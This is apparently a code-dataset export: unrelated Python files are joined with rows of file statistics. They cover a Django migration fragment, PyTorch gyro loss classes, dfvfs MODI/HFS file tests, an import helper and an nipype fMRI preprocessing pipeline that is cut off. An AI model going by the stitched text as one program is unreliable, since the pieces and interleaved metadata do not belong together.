                ('profile', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='profile.Profile')),
                ('version', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='datasets.Version')),
            ],
            options={
                'verbose_name': 'historical dataset',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
    ]
| 67.430303
| 372
| 0.614596
| 1,128
| 11,126
| 5.875887
| 0.149823
| 0.043452
| 0.029572
| 0.04647
| 0.802203
| 0.762372
| 0.738081
| 0.738081
| 0.738081
| 0.729481
| 0
| 0.012609
| 0.230182
| 11,126
| 164
| 373
| 67.841463
| 0.761238
| 0.004134
| 0
| 0.64557
| 1
| 0.006329
| 0.180719
| 0.021845
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.056962
| 0
| 0.075949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d3173660530d5cf2a6db7c83517b7b1b7e7b02fb
| 5,274
|
py
|
Python
|
src/DGLoss.py
|
ChanWoo25/denoise-imu-gyro
|
a72baa36d5ab40b61323ce80de8c73ae6e6932f7
|
[
"MIT"
] | null | null | null |
src/DGLoss.py
|
ChanWoo25/denoise-imu-gyro
|
a72baa36d5ab40b61323ce80de8c73ae6e6932f7
|
[
"MIT"
] | null | null | null |
src/DGLoss.py
|
ChanWoo25/denoise-imu-gyro
|
a72baa36d5ab40b61323ce80de8c73ae6e6932f7
|
[
"MIT"
] | null | null | null |
import torch
import numpy as np
from src.utils import bmtm, vnorm, fast_acc_integration
from src.lie_algebra import SO3
class DGLossVer1(torch.nn.Module):
    """Loss for low-frequency orientation increment"""

    def __init__(self, params):  # w, min_N, max_N, dt, huber
        """Read loss hyper-parameters from ``params['train']['loss']``."""
        super().__init__()
        # windows sizes
        self.min_N = params['train']['loss']['min_N']
        self.max_N = params['train']['loss']['max_N']
        self.min_train_freq = 2 ** self.min_N
        self.max_train_freq = 2 ** self.max_N
        # sampling time
        self.dt = params['train']['loss']['dt']  # (s)
        # weights on loss
        self.w = params['train']['loss']['w']
        self.sl = torch.nn.SmoothL1Loss()
        self.sln = torch.nn.SmoothL1Loss(reduction='none')
        self.huber = params['train']['loss']['huber']
        # NOTE(review): hard-codes CUDA; this fails on CPU-only hosts — confirm intended.
        self.weight = torch.ones(1, 1, self.min_train_freq).cuda() / self.min_train_freq
        self.N0 = 5  # remove first N0 increment in loss due not account padding
        # dv / dv_normed are read from params but not used inside this class;
        # presumably consumed by callers — verify.
        self.dv = params['train']['loss']['dv']
        self.dv_normed = params['train']['loss']['dv_normed']

    def f_huber(self, rs):
        """Huber loss function"""
        # Scaling the residuals by self.huber turns SmoothL1's unit knee into a
        # Huber loss with delta == self.huber; the huber**2 factor undoes the scaling.
        loss = self.w * self.sl(rs/self.huber, torch.zeros_like(rs)) * (self.huber**2)
        return loss

    def gyro_loss(self, w_hat, dw_16):
        """Forward errors with rotation matrices"""
        N = dw_16.shape[0]
        # Ground-truth increments subsampled every min_train_freq samples,
        # mapped to rotation matrices via the SO(3) exponential.
        drot_16 = SO3.exp(dw_16[:, ::self.min_train_freq].reshape(-1, 3).double())
        dw_hat = self.dt * w_hat.reshape(-1, 3).double()
        drot_hat = SO3.exp(dw_hat)
        # Compose consecutive predicted increments min_N times so drot_hat
        # spans windows of 2**min_N samples, matching drot_16's rate.
        for k in range(self.min_N):
            drot_hat = drot_hat[::2].bmm(drot_hat[1::2])
        # Residual rotation (log of relative rotation), dropping the first N0
        # windows affected by padding.
        rs = SO3.log(bmtm(drot_hat, drot_16)).reshape(N, -1, 3)[:, self.N0:]
        gyro_loss_16 = self.f_huber(rs)
        ## compute increment from min_train_freq to max_train_freq
        # NOTE(review): only the last iteration's loss is returned; if
        # min_N == max_N the loop never runs and gyro_loss_32 is unbound
        # (NameError). Also drot_32 is rebuilt from the original drot_16 each
        # iteration while drot_hat keeps halving, so the scales only match
        # when max_N == min_N + 1 — confirm against the training config.
        for k in range(self.min_N, self.max_N):
            drot_hat = drot_hat[::2].bmm(drot_hat[1::2])
            drot_32 = drot_16[::2].bmm(drot_16[1::2])
            rs = SO3.log(bmtm(drot_hat, drot_32)).reshape(N, -1, 3)[:, self.N0:]
            gyro_loss_32 = self.f_huber(rs)/(2**(k - self.min_N + 1)) / 2.0
        return gyro_loss_16, gyro_loss_32

    def forward(self, w_hat, dw_16):
        """Return the (min-frequency, next-frequency) gyro losses."""
        gyro16, gyro32 = self.gyro_loss(w_hat, dw_16)
        return gyro16, gyro32
class DGLossVer2(torch.nn.Module):
    """Loss for low-frequency orientation increment"""

    def __init__(self, params):  # w, min_N, max_N, dt, huber
        """Read loss hyper-parameters from ``params['train']['loss']``."""
        super().__init__()
        # windows sizes
        self.min_N = params['train']['loss']['min_N']
        self.max_N = params['train']['loss']['max_N']
        self.min_train_freq = 2 ** self.min_N
        self.max_train_freq = 2 ** self.max_N
        # sampling time
        self.dt = params['train']['loss']['dt']  # (s)
        # weights on loss
        self.w = params['train']['loss']['w']
        self.sl = torch.nn.SmoothL1Loss()
        self.sln = torch.nn.SmoothL1Loss(reduction='none')
        self.huber = params['train']['loss']['huber']
        # NOTE(review): hard-codes CUDA; this fails on CPU-only hosts — confirm intended.
        self.weight = torch.ones(1, 1, self.min_train_freq).cuda() / self.min_train_freq
        self.N0 = 5  # remove first N0 increment in loss due not account padding
        # dv / dv_normed are read from params but not used inside this class;
        # presumably consumed by callers — verify.
        self.dv = params['train']['loss']['dv']
        self.dv_normed = params['train']['loss']['dv_normed']

    def f_huber(self, rs):
        """Huber loss function"""
        # Scaling the residuals by self.huber turns SmoothL1's unit knee into a
        # Huber loss with delta == self.huber; the huber**2 factor undoes the scaling.
        loss = self.w * self.sl(rs/self.huber, torch.zeros_like(rs)) * (self.huber**2)
        return loss

    def gyro_loss(self, w_hat, dw_16):
        """Forward errors with rotation matrices"""
        N = dw_16.shape[0]
        # Ground-truth increments subsampled every min_train_freq samples,
        # mapped to rotation matrices via the SO(3) exponential.
        drot_16 = SO3.exp(dw_16[:, ::self.min_train_freq].reshape(-1, 3).double())
        dw_hat = self.dt * w_hat.reshape(-1, 3).double()
        drot_hat = SO3.exp(dw_hat)
        # Compose consecutive predicted increments min_N times so drot_hat
        # spans windows of 2**min_N samples, matching drot_16's rate.
        for k in range(self.min_N):
            drot_hat = drot_hat[::2].bmm(drot_hat[1::2])
        rs = SO3.log(bmtm(drot_hat, drot_16)).reshape(N, -1, 3)[:, self.N0:]
        gyro_loss_16 = self.f_huber(rs)
        ## compute increment from min_train_freq to max_train_freq
        # NOTE(review): only the last iteration's loss is returned; if
        # min_N == max_N the loop never runs and gyro_loss_32 is unbound
        # (NameError). Also drot_32 is rebuilt from the original drot_16 each
        # iteration while drot_hat keeps halving, so the scales only match
        # when max_N == min_N + 1 — confirm against the training config.
        for k in range(self.min_N, self.max_N):
            drot_hat = drot_hat[::2].bmm(drot_hat[1::2])
            drot_32 = drot_16[::2].bmm(drot_16[1::2])
            rs = SO3.log(bmtm(drot_hat, drot_32)).reshape(N, -1, 3)[:, self.N0:]
            gyro_loss_32 = self.f_huber(rs)/(2**(k - self.min_N + 1)) / 2.0
        return gyro_loss_16, gyro_loss_32

    def gaussian_nll_loss(self, w_hat, w_gt, w_mean: torch.Tensor, w_std):
        """Gaussian negative log-likelihood of the prediction error.

        The error (w_gt - w_hat) is modelled as Gaussian with the supplied
        per-channel mean/std; the constant log(2*pi)/2 term is omitted, which
        does not affect optimization.
        """
        eps = 1e-6
        w_var = w_std ** 2
        # Floor the variance in-place to avoid log(0) and division by zero.
        w_var[w_var < eps] = eps
        w_gap = w_gt - w_hat
        # Broadcast per-channel statistics over the sequence dimension.
        w_mean = w_mean.unsqueeze(1).expand_as(w_gap)
        w_var = w_var.unsqueeze(1).expand_as(w_gap)
        # print('_first:', _first.shape)
        # print('w_gap:', w_gap.shape)
        # print('w_mean:', w_mean.shape)
        # print('w_var:', w_var.shape)
        _first = torch.log(w_var)
        _second = (w_gap - w_mean)**2 / w_var
        _loss = (_first + _second) / 2.0
        return torch.mean(_loss)

    def forward(self, w_hat, dw_16, w_gt, w_mean, w_std):
        """Return the two gyro losses plus the Gaussian NLL term."""
        gyro16, gyro32 = self.gyro_loss(w_hat, dw_16)
        gnll = self.gaussian_nll_loss(w_hat, w_gt, w_mean, w_std)
        return gyro16, gyro32, gnll
| 37.671429
| 88
| 0.58722
| 824
| 5,274
| 3.512136
| 0.139563
| 0.043538
| 0.072564
| 0.044229
| 0.851071
| 0.851071
| 0.822046
| 0.807878
| 0.807878
| 0.785764
| 0
| 0.041455
| 0.254456
| 5,274
| 139
| 89
| 37.942446
| 0.694557
| 0.133485
| 0
| 0.755556
| 0
| 0
| 0.042478
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.044444
| 0
| 0.244444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6c95c0f01a97b574d1e9358ff0b1a256254b657c
| 5,726
|
py
|
Python
|
tests/file_io/modi_file_io.py
|
jaegeral/dfvfs
|
606d09bf4de0b5dcf20d1dddff879dfed5c93640
|
[
"Apache-2.0"
] | null | null | null |
tests/file_io/modi_file_io.py
|
jaegeral/dfvfs
|
606d09bf4de0b5dcf20d1dddff879dfed5c93640
|
[
"Apache-2.0"
] | null | null | null |
tests/file_io/modi_file_io.py
|
jaegeral/dfvfs
|
606d09bf4de0b5dcf20d1dddff879dfed5c93640
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for the file-like object implementation using pymodi."""
import unittest
from dfvfs.file_io import hfs_file_io
from dfvfs.lib import definitions
from dfvfs.lib import errors
from dfvfs.path import factory as path_spec_factory
from tests.file_io import test_lib
class SparseImageMODIFileTest(test_lib.HFSImageFileTestCase):
  """Tests the MODI file-like object on a spare image file."""

  def setUp(self):
    """Sets up the needed objects used throughout the test."""
    super(SparseImageMODIFileTest, self).setUp()
    test_path = self._GetTestFilePath(['hfsplus.sparseimage'])
    self._SkipIfPathNotExists(test_path)

    os_path_spec = path_spec_factory.Factory.NewPathSpec(
        definitions.TYPE_INDICATOR_OS, location=test_path)
    self._modi_path_spec = path_spec_factory.Factory.NewPathSpec(
        definitions.TYPE_INDICATOR_MODI, parent=os_path_spec)
    self._gpt_path_spec = path_spec_factory.Factory.NewPathSpec(
        definitions.TYPE_INDICATOR_GPT, location='/p1',
        parent=self._modi_path_spec)

  def _CreateHFSPathSpec(self, **kwargs):
    """Creates an HFS path specification with the GPT path spec as parent.

    Args:
      kwargs: keyword arguments such as identifier and location.

    Returns:
      PathSpec: HFS path specification.
    """
    return path_spec_factory.Factory.NewPathSpec(
        definitions.TYPE_INDICATOR_HFS, parent=self._gpt_path_spec, **kwargs)

  def testOpenCloseIdentifier(self):
    """Test the open and close functionality using an identifier."""
    path_spec = self._CreateHFSPathSpec(
        identifier=self._IDENTIFIER_PASSWORDS_TXT)
    file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)

    self._TestOpenCloseIdentifier(file_object)

  def testOpenCloseLocation(self):
    """Test the open and close functionality using a location."""
    path_spec = self._CreateHFSPathSpec(
        identifier=self._IDENTIFIER_PASSWORDS_TXT, location='/passwords.txt')
    file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)

    self._TestOpenCloseLocation(file_object)

    # Try open with a path specification that has no parent.
    path_spec.parent = None
    file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)

    with self.assertRaises(errors.PathSpecError):
      self._TestOpenCloseLocation(file_object)

  def testSeek(self):
    """Test the seek functionality."""
    path_spec = self._CreateHFSPathSpec(
        identifier=self._IDENTIFIER_ANOTHER_FILE,
        location='/a_directory/another_file')
    file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)

    self._TestSeek(file_object)

  def testRead(self):
    """Test the read functionality."""
    path_spec = self._CreateHFSPathSpec(
        identifier=self._IDENTIFIER_PASSWORDS_TXT, location='/passwords.txt')
    file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)

    self._TestRead(file_object)
class ZlibCompressedUDIFMODIFileTest(test_lib.HFSImageFileTestCase):
  """Tests the MODI file-like object on a zlib compressed UDIF image file."""

  _IDENTIFIER_ANOTHER_FILE = 21
  _IDENTIFIER_PASSWORDS_TXT = 23

  def setUp(self):
    """Sets up the needed objects used throughout the test."""
    super(ZlibCompressedUDIFMODIFileTest, self).setUp()
    test_path = self._GetTestFilePath(['hfsplus_zlib.dmg'])
    self._SkipIfPathNotExists(test_path)

    os_path_spec = path_spec_factory.Factory.NewPathSpec(
        definitions.TYPE_INDICATOR_OS, location=test_path)
    self._modi_path_spec = path_spec_factory.Factory.NewPathSpec(
        definitions.TYPE_INDICATOR_MODI, parent=os_path_spec)
    self._gpt_path_spec = path_spec_factory.Factory.NewPathSpec(
        definitions.TYPE_INDICATOR_GPT, location='/p1',
        parent=self._modi_path_spec)

  def _CreateHFSPathSpec(self, **kwargs):
    """Creates an HFS path specification with the GPT path spec as parent.

    Args:
      kwargs: keyword arguments such as identifier and location.

    Returns:
      PathSpec: HFS path specification.
    """
    return path_spec_factory.Factory.NewPathSpec(
        definitions.TYPE_INDICATOR_HFS, parent=self._gpt_path_spec, **kwargs)

  def testOpenCloseIdentifier(self):
    """Test the open and close functionality using an identifier."""
    path_spec = self._CreateHFSPathSpec(
        identifier=self._IDENTIFIER_PASSWORDS_TXT)
    file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)

    self._TestOpenCloseIdentifier(file_object)

  def testOpenCloseLocation(self):
    """Test the open and close functionality using a location."""
    path_spec = self._CreateHFSPathSpec(
        identifier=self._IDENTIFIER_PASSWORDS_TXT, location='/passwords.txt')
    file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)

    self._TestOpenCloseLocation(file_object)

    # Try open with a path specification that has no parent.
    path_spec.parent = None
    file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)

    with self.assertRaises(errors.PathSpecError):
      self._TestOpenCloseLocation(file_object)

  def testSeek(self):
    """Test the seek functionality."""
    path_spec = self._CreateHFSPathSpec(
        identifier=self._IDENTIFIER_ANOTHER_FILE,
        location='/a_directory/another_file')
    file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)

    self._TestSeek(file_object)

  def testRead(self):
    """Test the read functionality."""
    path_spec = self._CreateHFSPathSpec(
        identifier=self._IDENTIFIER_PASSWORDS_TXT, location='/passwords.txt')
    file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)

    self._TestRead(file_object)
if __name__ == '__main__':
  # Allow running this test module directly as a script.
  unittest.main()
| 38.689189
| 78
| 0.759169
| 714
| 5,726
| 5.721289
| 0.137255
| 0.103794
| 0.05508
| 0.054835
| 0.880783
| 0.880783
| 0.880783
| 0.859731
| 0.859731
| 0.859731
| 0
| 0.001444
| 0.153336
| 5,726
| 147
| 79
| 38.952381
| 0.841172
| 0.137793
| 0
| 0.833333
| 0
| 0
| 0.031841
| 0.010271
| 0
| 0
| 0
| 0
| 0.020833
| 1
| 0.104167
| false
| 0.072917
| 0.0625
| 0
| 0.208333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
6cd472aee687cd88fb4aecc5ccc94e43c3230b8a
| 168
|
py
|
Python
|
Systerm/_setup.py
|
ZytroCode/Systerm
|
688b1a9eab51ec2d2fcc8e921d57ae4ae585a1b7
|
[
"MIT"
] | 1
|
2022-03-01T02:36:29.000Z
|
2022-03-01T02:36:29.000Z
|
Systerm/_setup.py
|
ZytroCode/Systerm
|
688b1a9eab51ec2d2fcc8e921d57ae4ae585a1b7
|
[
"MIT"
] | 1
|
2022-03-04T03:20:50.000Z
|
2022-03-04T03:20:50.000Z
|
Systerm/_setup.py
|
ZytroCode/Systerm
|
688b1a9eab51ec2d2fcc8e921d57ae4ae585a1b7
|
[
"MIT"
] | null | null | null |
"""Used to avoid circular import."""
def init_meta():
    """Import and return the ``Systerm.meta`` module.

    The import is performed inside the function body so that it only
    happens at call time, avoiding a circular import at module load.
    """
    from Systerm import meta as meta_module
    return meta_module
def init_module():
    """Import and return the ``Systerm.module`` module.

    The import is performed inside the function body so that it only
    happens at call time, avoiding a circular import at module load.
    """
    from Systerm import module as module_module
    return module_module
| 18.666667
| 36
| 0.696429
| 23
| 168
| 5
| 0.521739
| 0.121739
| 0.295652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.22619
| 168
| 8
| 37
| 21
| 0.884615
| 0.178571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9f774fe70cbb89c385ead6bdd3738e32da3e8ebc
| 97,775
|
py
|
Python
|
cosanlab_preproc/pipelines.py
|
BryanGonzalez262/cosanlab_preproc
|
c6dad803178b608bf62758410c09d58657d08b81
|
[
"MIT"
] | 13
|
2018-01-16T19:45:41.000Z
|
2021-12-31T11:38:28.000Z
|
cosanlab_preproc/pipelines.py
|
BryanGonzalez262/cosanlab_preproc
|
c6dad803178b608bf62758410c09d58657d08b81
|
[
"MIT"
] | 15
|
2016-12-14T16:37:44.000Z
|
2020-05-04T17:32:21.000Z
|
cosanlab_preproc/pipelines.py
|
BryanGonzalez262/cosanlab_preproc
|
c6dad803178b608bf62758410c09d58657d08b81
|
[
"MIT"
] | 9
|
2017-08-16T18:16:03.000Z
|
2020-04-21T08:46:27.000Z
|
'''
Preproc Nipype Pipelines
========================
Various nipype pipelines
'''
__all__ = ['Couple_Preproc_Pipeline','TV_Preproc_Pipeline']
__author__ = ["Luke Chang"]
__license__ = "MIT"
from cosanlab_preproc.utils import get_n_slices, get_ta, get_slice_order, get_vox_dims
# def create_spm_preproc_func_pipeline(data_dir=None, subject_id=None, task_list=None):
#
# '''REQUIRES FIXS'''
# import nipype.interfaces.io as nio
# import nipype.interfaces.utility as util
# from nipype.pipeline.engine import Node, Workflow
# from nipype.interfaces.base import BaseInterface, TraitedSpec, File, traits
# import nipype.algorithms.rapidart as ra
# from nipype.interfaces import spm
# from nipype.interfaces.nipy.preprocess import ComputeMask
# import nipype.interfaces.matlab as mlab
# import os
# import nibabel as nib
# from IPython.display import Image
# import glob
# from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Quality_Control, Plot_Realignment_Parameters, Create_Covariates
#
# ###############################
# ## Set up Nodes
# ###############################
#
# ds = Node(nio.DataGrabber(infields=['subject_id', 'task_id'], outfields=['func', 'struc']),name='datasource')
# ds.inputs.base_directory = os.path.abspath(data_dir + '/' + subject_id)
# ds.inputs.template = '*'
# ds.inputs.sort_filelist = True
# ds.inputs.template_args = {'func': [['task_id']], 'struc':[]}
# ds.inputs.field_template = {'func': 'Functional/Raw/%s/func.nii','struc': 'Structural/SPGR/spgr.nii'}
# ds.inputs.subject_id = subject_id
# ds.inputs.task_id = task_list
# ds.iterables = ('task_id',task_list)
# # ds.run().outputs #show datafiles
#
# # #Setup Data Sinker for writing output files
# # datasink = Node(nio.DataSink(), name='sinker')
# # datasink.inputs.base_directory = '/path/to/output'
# # workflow.connect(realigner, 'realignment_parameters', datasink, 'motion.@par')
# # datasink.inputs.substitutions = [('_variable', 'variable'),('file_subject_', '')]
#
# #Get Timing Acquisition for slice timing
# tr = 2
# ta = Node(interface=util.Function(input_names=['tr', 'n_slices'], output_names=['ta'], function = get_ta), name="ta")
# ta.inputs.tr=tr
#
# #Slice Timing: sequential ascending
# slice_timing = Node(interface=spm.SliceTiming(), name="slice_timing")
# slice_timing.inputs.time_repetition = tr
# slice_timing.inputs.ref_slice = 1
#
# #Realignment - 6 parameters - realign to first image of very first series.
# realign = Node(interface=spm.Realign(), name="realign")
# realign.inputs.register_to_mean = True
#
# #Plot Realignment
# plot_realign = Node(interface=Plot_Realignment_Parameters(), name="plot_realign")
#
# #Artifact Detection
# art = Node(interface=ra.ArtifactDetect(), name="art")
# art.inputs.use_differences = [True,False]
# art.inputs.use_norm = True
# art.inputs.norm_threshold = 1
# art.inputs.zintensity_threshold = 3
# art.inputs.mask_type = 'file'
# art.inputs.parameter_source = 'SPM'
#
# #Coregister - 12 parameters, cost function = 'nmi', fwhm 7, interpolate, don't mask
# #anatomical to functional mean across all available data.
# coregister = Node(interface=spm.Coregister(), name="coregister")
# coregister.inputs.jobtype = 'estimate'
#
# # Segment structural, gray/white/csf,mni,
# segment = Node(interface=spm.Segment(), name="segment")
# segment.inputs.save_bias_corrected = True
#
# #Normalize - structural to MNI - then apply this to the coregistered functionals
# normalize = Node(interface=spm.Normalize(), name = "normalize")
# normalize.inputs.template = os.path.abspath(t1_template_file)
#
# #Plot normalization Check
# plot_normalization_check = Node(interface=Plot_Coregistration_Montage(), name="plot_normalization_check")
# plot_normalization_check.inputs.canonical_img = canonical_file
#
# #Create Mask
# compute_mask = Node(interface=ComputeMask(), name="compute_mask")
# #remove lower 5% of histogram of mean image
# compute_mask.inputs.m = .05
#
# #Smooth
# #implicit masking (.im) = 0, dtype = 0
# smooth = Node(interface=spm.Smooth(), name = "smooth")
# fwhmlist = [0,5,8]
# smooth.iterables = ('fwhm',fwhmlist)
#
# #Create Covariate matrix
# make_covariates = Node(interface=Create_Covariates(), name="make_covariates")
#
# ###############################
# ## Create Pipeline
# ###############################
#
# Preprocessed = Workflow(name="Preprocessed")
# Preprocessed.base_dir = os.path.abspath(data_dir + '/' + subject_id + '/Functional')
#
# Preprocessed.connect([(ds, ta, [(('func', get_n_slices), "n_slices")]),
# (ta, slice_timing, [("ta", "time_acquisition")]),
# (ds, slice_timing, [('func', 'in_files'),
# (('func', get_n_slices), "num_slices"),
# (('func', get_slice_order), "slice_order"),
# ]),
# (slice_timing, realign, [('timecorrected_files', 'in_files')]),
# (realign, compute_mask, [('mean_image','mean_volume')]),
# (realign,coregister, [('mean_image', 'target')]),
# (ds,coregister, [('struc', 'source')]),
# (coregister,segment, [('coregistered_source', 'data')]),
# (segment, normalize, [('transformation_mat','parameter_file'),
# ('bias_corrected_image', 'source'),]),
# (realign,normalize, [('realigned_files', 'apply_to_files'),
# (('realigned_files', get_vox_dims), 'write_voxel_sizes')]),
# (normalize, smooth, [('normalized_files', 'in_files')]),
# (compute_mask,art,[('brain_mask','mask_file')]),
# (realign,art,[('realignment_parameters','realignment_parameters')]),
# (realign,art,[('realigned_files','realigned_files')]),
# (realign,plot_realign, [('realignment_parameters', 'realignment_parameters')]),
# (normalize, plot_normalization_check, [('normalized_files', 'wra_img')]),
# (realign, make_covariates, [('realignment_parameters', 'realignment_parameters')]),
# (art, make_covariates, [('outlier_files', 'spike_id')]),
# ])
# return Preprocessed
def Couple_Preproc_Pipeline(base_dir=None, output_dir=None, subject_id=None, spm_path=None):
    """ Create a preprocessing workflow for the Couples Conflict Study using nipype

    Args:
        base_dir: path to data folder where raw subject folder is located
        output_dir: path to where key output files should be saved
        subject_id: subject_id (str)
        spm_path: path to spm folder

    Returns:
        workflow: a nipype workflow that can be run
    """
    from nipype.interfaces.dcm2nii import Dcm2nii
    from nipype.interfaces.fsl import Merge, TOPUP, ApplyTOPUP
    import nipype.interfaces.io as nio
    import nipype.interfaces.utility as util
    from nipype.interfaces.utility import Merge as Merge_List
    from nipype.pipeline.engine import Node, Workflow
    from nipype.interfaces.fsl.maths import UnaryMaths
    from nipype.interfaces.nipy.preprocess import Trim
    from nipype.algorithms.rapidart import ArtifactDetect
    from nipype.interfaces import spm
    from nipype.interfaces.spm import Normalize12
    from nipype.algorithms.misc import Gunzip
    from nipype.interfaces.nipy.preprocess import ComputeMask
    import nipype.interfaces.matlab as mlab
    from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Quality_Control, Plot_Realignment_Parameters, Create_Covariates
    from cosanlab_preproc.utils import get_resource_path, get_vox_dims, get_n_volumes
    import os
    import glob

    ########################################
    ## Setup Paths and Nodes
    ########################################

    # Specify Paths
    canonical_file = os.path.join(spm_path, 'canonical', 'single_subj_T1.nii')
    template_file = os.path.join(spm_path, 'tpm', 'TPM.nii')

    # Set the way matlab should be called
    mlab.MatlabCommand.set_default_matlab_cmd("matlab -nodesktop -nosplash")
    mlab.MatlabCommand.set_default_paths(spm_path)

    # Get File Names for different types of scans. Parse into separate processing streams
    datasource = Node(interface=nio.DataGrabber(infields=['subject_id'], outfields=['struct', 'ap', 'pa']), name='datasource')
    datasource.inputs.base_directory = base_dir
    datasource.inputs.template = '*'
    datasource.inputs.field_template = {'struct': '%s/Study*/t1w_32ch_mpr_08mm*',
                                        'ap': '%s/Study*/distortion_corr_32ch_ap*',
                                        'pa': '%s/Study*/distortion_corr_32ch_pa*'}
    datasource.inputs.template_args = {'struct': [['subject_id']], 'ap': [['subject_id']], 'pa': [['subject_id']]}
    datasource.inputs.subject_id = subject_id
    datasource.inputs.sort_filelist = True

    # iterate over functional scans to define paths
    # NOTE(review): functional scans are discovered by glob rather than through the
    # DataGrabber, so the folder naming must contain 'romcon_ap_32ch_mb8' — confirm.
    scan_file_list = glob.glob(os.path.join(base_dir, subject_id, 'Study*', '*'))
    func_list = [s for s in scan_file_list if "romcon_ap_32ch_mb8" in s]
    func_list = [s for s in func_list if "SBRef" not in s]  # Exclude sbref for now.
    func_source = Node(interface=util.IdentityInterface(fields=['scan']), name="func_source")
    func_source.iterables = ('scan', func_list)

    # Create Separate Converter Nodes for each different type of file. (dist corr scans need to be done before functional)
    ap_dcm2nii = Node(interface=Dcm2nii(), name='ap_dcm2nii')
    ap_dcm2nii.inputs.gzip_output = True
    ap_dcm2nii.inputs.output_dir = '.'
    ap_dcm2nii.inputs.date_in_filename = False

    pa_dcm2nii = Node(interface=Dcm2nii(), name='pa_dcm2nii')
    pa_dcm2nii.inputs.gzip_output = True
    pa_dcm2nii.inputs.output_dir = '.'
    pa_dcm2nii.inputs.date_in_filename = False

    f_dcm2nii = Node(interface=Dcm2nii(), name='f_dcm2nii')
    f_dcm2nii.inputs.gzip_output = True
    f_dcm2nii.inputs.output_dir = '.'
    f_dcm2nii.inputs.date_in_filename = False

    s_dcm2nii = Node(interface=Dcm2nii(), name='s_dcm2nii')
    s_dcm2nii.inputs.gzip_output = True
    s_dcm2nii.inputs.output_dir = '.'
    s_dcm2nii.inputs.date_in_filename = False

    ########################################
    ## Setup Nodes for distortion correction
    ########################################

    # merge output files into list
    merge_to_file_list = Node(interface=Merge_List(2), infields=['in1', 'in2'], name='merge_to_file_list')

    # fsl merge AP + PA files (depends on direction)
    merger = Node(interface=Merge(dimension='t'), name='merger')
    merger.inputs.output_type = 'NIFTI_GZ'

    # use topup to create distortion correction map
    topup = Node(interface=TOPUP(), name='topup')
    topup.inputs.encoding_file = os.path.join(get_resource_path(), 'epi_params_APPA_MB8.txt')
    topup.inputs.output_type = "NIFTI_GZ"
    topup.inputs.config = 'b02b0.cnf'

    # apply topup to all functional images
    apply_topup = Node(interface=ApplyTOPUP(), name='apply_topup')
    apply_topup.inputs.in_index = [1]
    apply_topup.inputs.encoding_file = os.path.join(get_resource_path(), 'epi_params_APPA_MB8.txt')
    apply_topup.inputs.output_type = "NIFTI_GZ"
    apply_topup.inputs.method = 'jac'
    apply_topup.inputs.interp = 'spline'

    # Clear out Zeros from spline interpolation using absolute value.
    abs_maths = Node(interface=UnaryMaths(), name='abs_maths')
    abs_maths.inputs.operation = 'abs'

    ########################################
    ## Preprocessing
    ########################################

    # Trim - remove first 10 TRs
    n_vols = 10
    trim = Node(interface=Trim(), name='trim')
    trim.inputs.begin_index = n_vols

    # Realignment - 6 parameters - realign to first image of very first series.
    realign = Node(interface=spm.Realign(), name="realign")
    realign.inputs.register_to_mean = True

    # Coregister - 12 parameters
    coregister = Node(interface=spm.Coregister(), name="coregister")
    coregister.inputs.jobtype = 'estwrite'

    # Plot Realignment
    plot_realign = Node(interface=Plot_Realignment_Parameters(), name="plot_realign")

    # Artifact Detection
    art = Node(interface=ArtifactDetect(), name="art")
    art.inputs.use_differences = [True, False]
    art.inputs.use_norm = True
    art.inputs.norm_threshold = 1
    art.inputs.zintensity_threshold = 3
    art.inputs.mask_type = 'file'
    art.inputs.parameter_source = 'SPM'

    # Gunzip - unzip the functional and structural images
    gunzip_struc = Node(Gunzip(), name="gunzip_struc")
    gunzip_func = Node(Gunzip(), name="gunzip_func")

    # Normalize - normalizes functional and structural images to the MNI template
    normalize = Node(interface=Normalize12(jobtype='estwrite', tpm=template_file),
                     name="normalize")

